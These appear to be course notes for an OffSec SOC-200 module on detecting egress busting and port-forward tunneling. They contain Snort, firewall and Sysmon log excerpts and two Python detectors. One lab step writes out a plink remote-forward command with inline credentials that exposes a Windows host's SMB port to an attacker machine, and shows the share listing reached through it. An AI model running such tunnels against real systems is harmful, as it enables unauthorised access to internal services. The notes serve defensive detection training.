Tree's Notes
  1. Courses
  2. OffSec
  3. SOC-200

Module 14: Network Evasion and Tunneling

Network Segmentation

Network Segmentation Concepts and Benefits

Concepts. Google/Wikipedia it.

Segmentation Theory

Concepts. Google/Wikipedia it.

Egress Busting

Detecting Egress Busting

Snort alerts generated by the egress busting attack

offsec@snort02:~$ tail /var/log/snort/alert_fast.txt 
01/28-21:15:49.133529 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50167 -> 192.168.48.4:491
01/28-21:15:49.149038 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50168 -> 192.168.48.4:492
01/28-21:15:49.164680 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50169 -> 192.168.48.4:493
01/28-21:15:49.180393 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50170 -> 192.168.48.4:494
01/28-21:15:49.195977 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50171 -> 192.168.48.4:495
01/28-21:15:49.211640 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50172 -> 192.168.48.4:496
01/28-21:15:49.227126 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50173 -> 192.168.48.4:497
01/28-21:15:49.242844 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50174 -> 192.168.48.4:498
01/28-21:15:49.258451 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50175 -> 192.168.48.4:499
01/28-21:15:49.274751 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50176 -> 192.168.48.4:500
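The Snort rule above fires once per connection, so on its own it only says "outbound traffic". What turns those ten lines into an egress-busting detection is the pattern across them: one internal host, one external destination, and ten consecutive destination ports within about 150 ms. The following Python is an added example, not part of the course material or of these notes' original content; it parses alert_fast.txt lines and groups them per source/destination pair with a sliding time window. The thresholds (5 distinct ports within 10 seconds) and the extra benign alert line are constructed assumptions for the demonstration, not values from the module.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: the ten alert_fast.txt lines from the listing above, plus one
# unrelated single alert from another host so the detector has something to ignore.
SAMPLE_ALERTS = """\
01/28-21:15:49.133529 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50167 -> 192.168.48.4:491
01/28-21:15:49.149038 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50168 -> 192.168.48.4:492
01/28-21:15:49.164680 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50169 -> 192.168.48.4:493
01/28-21:15:49.180393 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50170 -> 192.168.48.4:494
01/28-21:15:49.195977 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50171 -> 192.168.48.4:495
01/28-21:15:49.211640 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50172 -> 192.168.48.4:496
01/28-21:15:49.227126 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50173 -> 192.168.48.4:497
01/28-21:15:49.242844 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50174 -> 192.168.48.4:498
01/28-21:15:49.258451 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50175 -> 192.168.48.4:499
01/28-21:15:49.274751 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50176 -> 192.168.48.4:500
01/28-21:10:02.000000 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.12:40001 -> 192.168.48.4:443
"""

# Snort "alert_fast" line. ICMP alerts carry no ports and deliberately do not match,
# since egress busting is a TCP/UDP port-walk.
ALERT_RE = re.compile(
    r'^(?P<ts>\d{2}/\d{2}-\d{2}:\d{2}:\d{2}\.\d+)\s+\[\*\*\]\s+'
    r'\[(?P<sid>\d+:\d+:\d+)\]\s+"(?P<msg>[^"]*)"\s+\[\*\*\]\s+'
    r'(?:\[Classification:[^\]]*\]\s+)?\[Priority:\s*(?P<pri>\d+)\]\s+'
    r'\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+'
    r'(?P<dst>[\d.]+):(?P<dport>\d+)\s*$'
)


def parse_alerts(text):
    """Parse alert_fast lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = ALERT_RE.match(line.strip())
        if not m:
            continue
        events.append({
            # alert_fast timestamps carry no year; strptime defaults to 1900, which is
            # fine because only differences between timestamps are used below.
            'ts': datetime.strptime(m['ts'], '%m/%d-%H:%M:%S.%f'),
            'sid': m['sid'], 'msg': m['msg'], 'proto': m['proto'],
            'src': m['src'], 'dst': m['dst'],
            'sport': int(m['sport']), 'dport': int(m['dport']),
        })
    return events


def detect_egress_busting(events, min_ports=5, window_seconds=10.0):
    """Report (src, dst) pairs that hit >= min_ports distinct destination ports
    inside any window_seconds-long window. Thresholds are assumptions for this example."""
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e['src'], e['dst'])].append(e)

    findings = []
    for (src, dst), evs in by_pair.items():
        evs.sort(key=lambda e: e['ts'])
        best, left = None, 0
        for right in range(len(evs)):
            # Slide the left edge until the window fits inside window_seconds.
            while (evs[right]['ts'] - evs[left]['ts']).total_seconds() > window_seconds:
                left += 1
            ports = sorted({e['dport'] for e in evs[left:right + 1]})
            if len(ports) >= min_ports and (best is None or len(ports) > best['distinct_ports']):
                best = {
                    'src': src, 'dst': dst,
                    'distinct_ports': len(ports),
                    'first_port': ports[0], 'last_port': ports[-1],
                    # A strictly consecutive port range is the classic egress-buster signature.
                    'sequential': all(b - a == 1 for a, b in zip(ports, ports[1:])),
                    'window_start': evs[left]['ts'].strftime('%m/%d-%H:%M:%S.%f'),
                    'window_end': evs[right]['ts'].strftime('%m/%d-%H:%M:%S.%f'),
                }
        if best:
            findings.append(best)
    return findings


if __name__ == '__main__':
    for f in detect_egress_busting(parse_alerts(SAMPLE_ALERTS)):
        print(f)
```

Run it against a real alert_fast.txt by reading the file into parse_alerts; a finding with sequential=True and a large distinct_ports count is the egress buster, while a single allowed outbound connection from another host never reaches the threshold.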

Port Forwarding and Tunneling

Port Forwarding and Tunneling Theory

Port Forwarding and Tunneling in Practice

Reading the Windows Firewall With Advanced Security/Firewall Event Log

PS C:\Users\Administrator> Get-WinEvent -FilterHashtable @{LogName = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'} -MaxEvents 20

   ProviderName: Microsoft-Windows-Windows Firewall With Advanced Security

TimeCreated                     Id LevelDisplayName Message
-----------                     -- ---------------- -------
1/31/2022 10:03:01 PM         2008 Information      Windows Defender Firewall Group Policy settings have changed. The new settings have been applied
1/31/2022 9:58:43 PM          2004 Information      A rule has been added to the Windows Defender Firewall exception list....

Listing all the inbound firewall rules

PS C:\Users\Administrator> Get-NetFirewallRule -Direction Inbound | Select-Object -Property DisplayName,Profile,Enabled | Where { $_.Enabled -eq 'True'}

DisplayName                                                                                Profile Enabled
-----------                                                                                ------- -------
...
Cortana                                                                            Domain, Private    True
Network Discovery (Pub-WSD-In)                                                             Private    True
Network Discovery (LLMNR-UDP-In)                                                           Private    True
Network Discovery (WSD-In)                                                                 Private    True
Network Discovery (SSDP-In)                                                                Private    True
Network Discovery (WSD Events-In)                                                          Private    True
Network Discovery (WSD EventsSecure-In)                                                    Private    True
Network Discovery (NB-Datagram-In)                                                         Private    True
Network Discovery (NB-Name-In)                                                             Private    True
Network Discovery (UPnP-In)                                                                Private    True
Desktop App Web Viewer                                                     Domain, Private, Public    True
forward_port_rule                                                                              Any    True

Getting detailed information using the rule name

PS C:\Users\Administrator> Get-NetFirewallRule -DisplayName "forward_port_rule"

Name                  : {F55666F7-6A7C-4049-BEE6-CD7407E7120A}
DisplayName           : forward_port_rule
Description           :
DisplayGroup          :
Group                 :
Enabled               : True
Profile               : Any
Platform              : {}
Direction             : Inbound
Action                : Allow
EdgeTraversalPolicy   : Block
LooseSourceMapping    : False
LocalOnlyMapping      : False
Owner                 :
PrimaryStatus         : OK
Status                : The rule was parsed successfully from the store. (65536)
EnforcementStatus     : NotApplicable
PolicyStoreSource     : PersistentStore
PolicyStoreSourceType : Local

PS C:\Users\Administrator> Get-NetFirewallRule -DisplayName "forward_port_rule" | Get-NetFirewallPortFilter

Protocol      : TCP
LocalPort     : 21
RemotePort    : Any
IcmpType      : Any
DynamicTarget : Any

Inspecting the configuration of the portproxy interface using netsh

PS C:\Users\Administrator> netsh interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
172.16.50.11    21          172.16.50.12    3306

Remote port forwarding using plink.exe

echo y | plink.exe -ssh -N -l kali -pw toor -R 192.168.48.2:1234:127.0.0.1:445 192.168.48.2 

Confirming the port forward is set up

kali@attacker01:~ $ ss -antp | grep 1234
 State     Recv-Q     Send-Q     Local Address:Port   Peer Address:Port     Process
LISTEN    0          128        127.0.0.1:1234       0.0.0.0:*             users:(("sshd",pid=2801,fd=10))

Accessing the network shares using smbclient

kali@attacker01:~ $ smbclient -L 127.0.0.1 --port=1234 --user=Administrator
Enter WORKGROUP\Administrator's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        htdocs          Disk      
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

Listing the Sysmon event logs while filtering for the plink string in the Message

PS C:\Users\Administrator> Get-SysmonEvent | Where-Object { $_.Message -like "*plink*" }

   ProviderName: Microsoft-Windows-Sysmon

TimeCreated                     Id LevelDisplayName Message
-----------                     -- ---------------- -------
2/1/2022 12:02:39 AM             1 Information      Process Create:...
2/1/2022 12:00:59 AM             5 Information      Process terminated:...
1/31/2022 11:47:42 PM            1 Information      Process Create:...
1/31/2022 11:47:34 PM            5 Information      Process terminated:...
1/31/2022 11:47:34 PM            1 Information      Process Create:...
1/31/2022 11:47:19 PM            5 Information      Process terminated:...
1/31/2022 11:47:19 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...

Getting detailed information from the Sysmon event logs

PS C:\Users\Administrator> Get-SysmonEvent 1 "1/31/2022 11:46:12" "2/1/2022 12:02:39" | Where-Object { $_.Message -like "*plink*" } | Format-List
...
TimeCreated  : 2/1/2022 12:02:39 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               RuleName: -
               UtcTime: 2022-02-01 08:02:39.016
               ProcessGuid: {6c804c53-e91f-61f8-9b00-000000002500}
               ProcessId: 7592
               Image: C:\xampp\htdocs\simple_upload\uploaded_files\plink.exe
               FileVersion: Release 0.76
               Description: Command-line SSH, Telnet, and Rlogin client
               Product: PuTTY suite
               Company: Simon Tatham
               OriginalFileName: Plink
               CommandLine: plink.exe  -ssh -N -l root -pw toor -R 192.168.48.2:1234:127.0.0.1:445 192.168.48.2
               CurrentDirectory: C:\xampp\htdocs\simple_upload\uploaded_files\
               User: SERVER03\Administrator
               LogonGuid: {6c804c53-e8ec-61f8-069f-060000000000}
               LogonId: 0x69F06
               TerminalSessionId: 2
               IntegrityLevel: High
               Hashes: SHA256=828E81AA16B2851561FFF6D3127663EA2D1D68571F06CBD732FDF5672086924D
               ParentProcessGuid: {6c804c53-e8f5-61f8-8f00-000000002500}
               ParentProcessId: 656
               ParentImage: C:\Windows\System32\cmd.exe
               ParentCommandLine: "C:\Windows\system32\cmd.exe"
               ParentUser: SERVER03\Administrator
...
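Filtering on the string "plink" works in the lab, but the Sysmon Event ID 1 record above carries enough structure to detect the technique rather than the tool name: the Image and OriginalFileName identify an SSH client, the CommandLine contains a -R spec whose target is 127.0.0.1:445, and the binary runs out of a web upload directory with an inline password. The Python below is an added example, not from the course or from these notes' original content; it parses the Message block of a Process Create event into fields and pulls the tunnel definition out of the command line for -R, -L and -D (remote, local and dynamic forwarding). The sample message reuses the record shown above; the port-to-service table, the path hints, and the scoring are assumptions for the demonstration.

```python
import shlex

# Constructed sample: the Message body of the Sysmon Event ID 1 record shown above.
# Raw string because the Windows paths contain backslashes.
SAMPLE_SYSMON_MESSAGE = r"""Process Create:
RuleName: -
UtcTime: 2022-02-01 08:02:39.016
ProcessGuid: {6c804c53-e91f-61f8-9b00-000000002500}
ProcessId: 7592
Image: C:\xampp\htdocs\simple_upload\uploaded_files\plink.exe
FileVersion: Release 0.76
Description: Command-line SSH, Telnet, and Rlogin client
Product: PuTTY suite
Company: Simon Tatham
OriginalFileName: Plink
CommandLine: plink.exe  -ssh -N -l root -pw toor -R 192.168.48.2:1234:127.0.0.1:445 192.168.48.2
CurrentDirectory: C:\xampp\htdocs\simple_upload\uploaded_files\
User: SERVER03\Administrator
LogonId: 0x69F06
IntegrityLevel: High
Hashes: SHA256=828E81AA16B2851561FFF6D3127663EA2D1D68571F06CBD732FDF5672086924D
ParentProcessId: 656
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\Windows\system32\cmd.exe"
ParentUser: SERVER03\Administrator
"""

FORWARD_FLAGS = {'-R': 'remote', '-L': 'local', '-D': 'dynamic'}
# Assumed mapping of tunnel targets to the service they expose; extend as needed.
SERVICE_PORTS = {445: 'SMB', 3389: 'RDP', 135: 'RPC', 5985: 'WinRM', 22: 'SSH', 3306: 'MySQL'}
# Heuristic: SSH clients do not normally run from these locations (assumption).
UNUSUAL_PATH_HINTS = ('\\htdocs\\', '\\uploaded_files\\', '\\wwwroot\\', '\\temp\\', '\\public\\')


def parse_sysmon_message(message):
    """Turn the 'Key: value' lines of a Sysmon message into a dict; line 1 is the event type."""
    lines = message.strip().splitlines()
    event = {'EventType': lines[0].rstrip(':')}
    for line in lines[1:]:
        key, sep, value = line.partition(':')   # first colon only; values may contain ':'
        if sep:
            event[key.strip()] = value.strip()
    return event


def find_tunnel_args(command_line):
    """Extract -R/-L/-D forwarding specs from an ssh/plink command line."""
    tokens = shlex.split(command_line, posix=False)  # posix=False keeps Windows backslashes
    tunnels = []
    for i, tok in enumerate(tokens):
        kind = FORWARD_FLAGS.get(tok)
        if kind is None or i + 1 >= len(tokens):
            continue
        parts = tokens[i + 1].split(':')
        if kind == 'dynamic':            # -D [bind_addr:]port -> SOCKS proxy, no fixed target
            tunnels.append({'type': kind, 'bind': tokens[i + 1], 'target': None, 'target_port': None})
        elif len(parts) == 4:            # bind_addr:bind_port:target_host:target_port
            port = int(parts[3]) if parts[3].isdigit() else None
            tunnels.append({'type': kind, 'bind': parts[0] + ':' + parts[1],
                            'target': parts[2] + ':' + parts[3], 'target_port': port})
        elif len(parts) == 3:            # bind_port:target_host:target_port
            port = int(parts[2]) if parts[2].isdigit() else None
            tunnels.append({'type': kind, 'bind': parts[0],
                            'target': parts[1] + ':' + parts[2], 'target_port': port})
    return tunnels


def analyze_process_create(event):
    """Score a parsed Event ID 1 for SSH-tunnel pivoting; returns tunnels plus indicators."""
    image = event.get('Image', '')
    cmd = event.get('CommandLine', '')
    exe = image.rsplit('\\', 1)[-1].lower()
    is_ssh_client = exe in {'plink.exe', 'ssh.exe'} or event.get('OriginalFileName', '').lower() == 'plink'
    tunnels = find_tunnel_args(cmd) if is_ssh_client else []
    tokens = shlex.split(cmd, posix=False) if cmd else []
    indicators = []
    for t in tunnels:
        indicators.append('%s_forward' % t['type'])
        if t['type'] == 'remote':
            indicators.append('internal_service_exposed_to_remote_host')
        svc = SERVICE_PORTS.get(t['target_port'])
        if svc:
            indicators.append('tunnel_to_' + svc)
    if is_ssh_client and '-pw' in tokens:
        indicators.append('inline_password')
    if is_ssh_client and '-N' in tokens:
        indicators.append('no_shell_tunnel_only')
    if any(h in image.lower() for h in UNUSUAL_PATH_HINTS):
        indicators.append('unusual_image_path')
    return {'image': image, 'user': event.get('User'), 'parent': event.get('ParentImage'),
            'tunnels': tunnels, 'indicators': indicators,
            'suspicious': bool(tunnels) and len(indicators) >= 2}


if __name__ == '__main__':
    print(analyze_process_create(parse_sysmon_message(SAMPLE_SYSMON_MESSAGE)))
```

The Message text for a real event comes straight from the Get-SysmonEvent output shown above (or Get-WinEvent on Microsoft-Windows-Sysmon/Operational), so the same parser can be run over an exported batch of Event ID 1 records; a renamed plink binary still surfaces through OriginalFileName and the -R argument, which the plain "*plink*" filter would miss.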


Local forwarding / tunneling
Remote forwarding / tunneling
Dynamic forwarding / tunneling